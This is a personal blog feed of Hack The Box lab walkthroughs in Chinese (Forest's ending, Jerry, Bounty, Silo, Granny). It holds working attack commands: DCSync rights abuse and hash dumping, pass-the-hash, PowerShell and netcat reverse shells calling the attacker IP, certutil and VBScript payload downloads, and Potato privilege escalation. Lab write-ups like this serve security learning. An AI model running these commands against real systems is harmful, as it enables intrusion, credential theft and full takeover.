創建一個 user 並加入 EXCHANGE WINDOWS PERMISSIONS group
DCsync 攻擊 dump 出 password

創建 user

net user flydragon password123 /add /domain

把剛剛創建的 user 加進 EXCHANGE WINDOWS PERMISSIONS group

net group "EXCHANGE WINDOWS PERMISSIONS" /add flydragon

接下來照著 BloodHound 給的建議做

$SecPassword = ConvertTo-SecureString 'password123' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('htb\flydragon', $SecPassword)

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity flydragon -Rights DCSync

最後一行報錯了，查了一下知道要 import PowerView module
(kali 上已經有了 /usr/share/windows-resources/powersploit/Recon/PowerView.ps1)

certutil.exe -urlcache -split -f http://10.10.16.3:8000/PowerView.ps1

Import-Module .\PowerView.ps1

再送一次這個

Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity flydragon -Rights DCSync

可以開始 dump password ㄌ！

impacket-secretsdump htb.local/flydragon:password123@10.10.10.161

會有很多個，但重點是 Administrator 的密碼

htblocal\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::

impacket-psexec htb.local/Administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

拿到 Root Shell

後記

這台我分兩天才打完，確定是 Easy 嗎 Orz

[HTB] Jerry Walkthrough

Mon, 15 Apr 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Jerry，難度是 Easy

使用到的技巧：

WAR webshell

Attacker: 10.10.16.2
Target: 10.10.10.95

Recon

nmap

sudo nmap -sV -sC 10.10.10.95

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1

Tomcat 開在 8080

Exploit

選 Manager App 會要你登入
Cancel 掉之後會有一組 credential 可以用
tomcat/s3cret

用這個工具產 war webshell
https://github.com/p0dalirius/Tomcat-webshell-application

再回到 Manager App 頁面 Deploy 這個 war file

直接拿到 system 了，就很矇

接下來可以用 console.py 彈 rev-shell

[HTB] Bounty Walkthrough

Mon, 15 Apr 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Bounty，難度是 Easy

使用到的技巧：

更多彈 rev-shell 的方法
JuicyPotato 提權

Attacker: 10.10.16.2
Target: 10.10.10.93

Recon

nmap

sudo nmap -sV -sC 10.10.10.93

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

開了 80 port，是一張圖片

dirsearch

dirsearch -u http://10.10.10.93/ -r

沒搜到什麼

gobuster
沒其他想法所以換個目錄列舉的工具跟字典檔

gobuster dir -u 10.10.10.93 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 20

只搜到一個 /uploadedfiles (Forbidden)
這邊卡住了，看別人的 write-up 才知道還有一個 transfer.aspx ==
可以用來上傳檔案

Exploit

上傳功能不能傳 .aspx 改用 web.config 是類似 .htaccess 的東東
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config

傳上去就有 webshell 了

接下來嘗試彈 rev-shell

nc.exe -e cmd.exe 10.10.16.2 4444

沒收到 shell 換個 payload

powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("10.10.16.2",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

還是沒收到，再換一個

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.2',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

收到 uesr shell

Privilege Escalation

看評論的時候被暴雷了，知道可以直接用 Potato 一刀殺進去

whoami /priv

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

其中 SeImpersonatePrivilege 是 Enabled 代表可以用 Potato 提權
上傳 jucypotato 和 reverse-shell.bat 就完成準備工作了

.\JuicyPotato.exe -t * -p reverse-shell.bat -l 4444

收到 system shell

[HTB] Silo Walkthrough

Sun, 14 Apr 2024 00:00:00 GMT

前言

這台是 Hack The Box 的 Silo，難度是 Medium

使用到的技巧：

odat 滲透 Oracle database

Attacker: 10.10.16.2
Target: 10.10.10.82

Recon

nmap

sudo nmap -sV -sC 10.10.10.82

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49159/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49160/tcp open  msrpc        Microsoft Windows RPC
49161/tcp open  msrpc        Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -3m49s, deviation: 0s, median: -3m49s
| smb2-security-mode: 
|   3.0.2: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-04-12T02:38:38
|_  start_date: 2024-04-12T02:27:39
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported

再掃一下 smb

sudo nmap -sV -sC -p445 --script=smb-vuln* 10.10.10.82

Host script results:
|_smb-vuln-ms10-061: No accounts left to try
|_smb-vuln-ms10-054: false

smbclient、smbmap、dirsearch 沒找到什麼，轉換目標摸摸看 oracle-tns

odat

可以參考這篇，寫得很清晰明瞭
https://www.whiteoaksecurity.com/blog/exploiting-oracle-databases-with-odat/

sudo odat all -s 10.10.10.82

經過漫長的等待可以拿到這個 credential

[+] Accounts found on 10.10.10.82:1521/sid:XE: 
scott/tiger

Exploit

到 odat 的 github page （或是 -h）可以知道 utlfile 這個 module 可以用來上傳/下載/刪除檔案
可以嘗試上傳 reverse shell

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /test reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe

權限不夠

[-] Impossible to put the ../../Windows_tools/reverse-shell.exe file: `ORA-01031: insufficient privileges`

嘗試加上 sysdba flag

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /test reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe --sysdba

還是不行，嘗試另外兩個可以上傳檔案的 module 也失敗

[-] Impossible to put the /home/kali/HTB/Windows_tools/reverse-shell.exe file: `ORA-29283: invalid file operation ORA-06512: at "SYS.UTL_FILE", line 536 ORA-29283: invalid file operation ORA-06512: at line 1`

最後換個上傳路徑才成功

odat utlfile -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --putFile /temp reverse-shell.exe /home/kali/HTB/Windows_tools/reverse-shell.exe --sysdba

接下來再執行上傳的 shell

odat externaltable -s 10.10.10.82 -d 'XE' -U 'scott' -P 'tiger' --exec /temp reverse-shell.exe --sysdba

執行成功ㄌ！但沒收到 shell 就很玄。
不過重新生一個 shell 就成功了，虛驚一場
直接拿到 system

[HTB] Granny Walkthrough

Mon, 08 Apr 2024 00:00:00 GMT

前言

~~看到朋友在寫所以 the 學~~
剛接觸 Windows 滲透，不想重複踩坑，所以來寫靶機的 Write-up，做個紀錄這樣 XD
這台是 Hack The Box 的 Granny，難度是 Easy

使用到的技巧：

VBScript 傳輸檔案
churrasco.exe 提權

Attacker: 10.10.16.2
Target: 10.10.10.15

Recon

nmap

sudo nmap -sV -sC 10.10.10.15

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
|_http-server-header: Microsoft-IIS/6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan: 
|   Server Date: Mon, 08 Apr 2024 02:27:18 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   WebDAV type: Unknown
|   Server Type: Microsoft-IIS/6.0
|_  Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|_http-title: Under Construction
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.73 seconds

看起來是 WebDav Server，且用 PUT method 可以上傳檔案

看看 Web 的部分

用 burp 看 response header 可以知道是 ASP.NET 框架

dirsearch

dirsearch -u http://10.10.10.15/ -r

有些資訊洩漏，但沒什麼想法

[22:45:28] 200 -  246B  - /_private/     (Added to queue)                   
[22:45:28] 301 -  153B  - /_private  ->  http://10.10.10.15/%5Fprivate/     
[22:45:28] 200 -  759B  - /_vti_bin/     (Added to queue)                   
[22:45:28] 301 -  155B  - /_vti_bin  ->  http://10.10.10.15/%5Fvti%5Fbin/
[22:45:28] 200 -    2KB - /_vti_inf.html                                    
[22:45:28] 301 -  155B  - /_vti_log  ->  http://10.10.10.15/%5Fvti%5Flog/
[22:45:28] 200 -  246B  - /_vti_log/     (Added to queue)
[22:45:28] 500 -   88B  - /_vti_cnf/
[22:45:29] 200 -  195B  - /_vti_bin/_vti_aut/author.dll                     
[22:45:29] 200 -   96B  - /_vti_bin/shtml.exe?_vti_rpc
[22:45:29] 500 -   88B  - /_vti_pvt/
[22:45:29] 200 -  195B  - /_vti_bin/_vti_adm/admin.dll
[22:45:29] 200 -  106B  - /_vti_bin/shtml.exe/qwertyuiop                    
[22:45:29] 200 -  105B  - /_vti_bin/shtml.dll/asdfghjkl                     
[22:45:29] 200 -   96B  - /_vti_bin/shtml.dll
[22:45:40] 200 -  369B  - /aspnet_client/     (Added to queue)              
[22:45:40] 301 -  158B  - /aspnet_client  ->  http://10.10.10.15/aspnet%5Fclient/
[22:45:52] 301 -  149B  - /images  ->  http://10.10.10.15/images/     (Added to queue)
[22:45:52] 200 -  242B  - /images/
[22:46:08] 200 -    2KB - /postinfo.html

Exploit

Google

找到一個 RCE 的 exploit
https://github.com/eliuha/webdav_exploit

沒拿到 shell 換個 exploit
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/blob/master/iis6%20reverse%20shell

拿到 shell ㄌ，但還拿不到 user flag

Privilege Escalation

systeminfo + Windows-exploit-suggester

python2 windows-exploit-suggester.py --database 2024-04-01-mssb.xls --systeminfo sysinfo.txt

拿到蠻多路線的，可以一個一個嘗試

不過沒辦法用 powershell 傳輸檔案

powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.10.16.2:8000/ms15-051_x32.exe', 'ms15-051_x32.exe')"

改用 Certutil.exe 也不行

certutil.exe -urlcache -split -f http://10.10.16.2:8000/ms15-051_x32.exe

不過之前 RECON 知道可以用 PUT 上傳檔案
用 davtest 確認一下可以上傳的 extension

davtest -url http://10.10.10.15

 Sending test files
PUT     shtml   FAIL
PUT     cgi     FAIL
PUT     cfm     FAIL
PUT     pl      FAIL
PUT     php     FAIL
PUT     aspx    FAIL
PUT     asp     FAIL
PUT     jsp     FAIL
PUT     txt     FAIL
PUT     html    FAIL
PUT     jhtml   FAIL

哭阿，居然沒得用

只好用 VBScript

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

cscript /nologo wget.vbs http://10.10.16.2:8000/ms15-051_x32.exe ms15-051_x32.exe

.\ms15-015_x32.exe

卡住了，ctrl+c 重發 exploit，然後就拿不到 shell ㄌ

一個一個試太浪費時間，等待 Reset 的垃圾時間再去 Google 一下
找到 churrasco.exe

https://github.com/Re4son/Churrasco/

用 VBScript 上傳 churrasco.exe 跟 nc_x32.exe
再用 churrasco.exe 彈 reverse shell

churrasco.exe -d "nc_x32.exe -e cmd.exe 10.10.16.2 1234"

提權成功！

後記

RCE 部分很明確，後來看其他人的 Write-up 發現還有蠻多種方法
提權部分就有點坐牢了，老機器減少樂趣QQ
學到用 VBScript 傳輸檔案跟新的提權方式還是蠻賺的，可惜沒怎麼玩到 WebDav

Hello World!

Wed, 03 Apr 2024 00:00:00 GMT

覺得這個 theme 很好看，所以建了 blog

這裡的內容主要是紀錄為主，可能不會有太多美化。